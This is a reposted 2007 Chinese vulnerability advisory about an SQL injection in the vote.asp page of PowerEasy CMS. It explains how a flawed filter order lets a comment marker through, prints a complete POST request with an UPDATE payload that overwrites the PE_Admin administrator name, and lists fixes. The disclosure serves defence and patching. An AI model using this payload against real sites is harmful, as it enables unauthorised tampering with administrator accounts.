首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 专题文章

动易网站管理系统vote.asp页面存在SQL注入漏洞


http://www.gipsky.com/
---------------------------------------------

http://www..com

's Security Blog

BCT授权本站独家转载,转载请保留此签名。

---------------------------------------------



Infos: 漏洞预警中心小组应急事件响应公告(BCTCERA0701)

Author: admin

Date: 31/10/2007



动易网站治理系统vote.asp页面存在SQL注入漏洞



测试系统:

动易(PowerEasy CMS SP6 071030以下版本)



安全综述:

动易网站治理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容治理解决方案产品。



漏洞描述:

vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入

但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制。但是其过滤的顺序不对。有导致mssql的注释符号--可以进入语句



测试方法:



POST Vote.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://127.0.0.1/Vote.asp?ID=2&Action=Show

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Host: 127.0.0.1

Content-Length: 160

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: rtime=0; ltime=1191765883073; cnzz_eid=6855133-; AJSTAT_ok_times=2; ViewMode=1; PJBlog2Setting=ViewType=normal; http://kw.lyedu.com.cn=lao=8; style=null; chkRemember=false; ASPSESSIONIDSSRCABTA=JJODPHAACKPHCFNFCKEINALN; VotedID=1



VoteOption=1=1 update PE_Admin set adminname=0x61-;-&VoteType=Multi&Action=Vote&ID=2



其中 1=1 update PE_Admin set adminname=0x61-;-解码后为

1=1 update PE_Admin set adminname=0x61-;-

他们先过滤了--再过滤; 导致以-;-的形式可以很轻松的把注释符带入语句,执行语句后,成功把治理员的用户名设置为a

解决方案:

更新动易组件(需要治理员的权限才能更新)。

不需要投票功能的用户,删除此文件。

有需要,但是又没有权限更新动易组件(需要治理员的权限才能更新)的用户。请在vote.asp文件自行过滤各个参数。



关于Bug.Center.Team

Bug.Center.Team(又名:漏洞预警中心小组)是国内较早成立的以脚本安全为主要方向的网络安全组织,致力于网络和脚本安全问题的研究,在对于脚本程序的修补、维护、漏洞检测都有专业水平,是国内最专业、最经验的安全服务组织,有关Bug.Center.Team的详情请参见: http://www.cnbct.org







[最后修改由 , 于 2007-10-31 14:52:01]
<< 50个计算机热门视频教程免费下载 动易27个0day之一:vote.asp注入 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号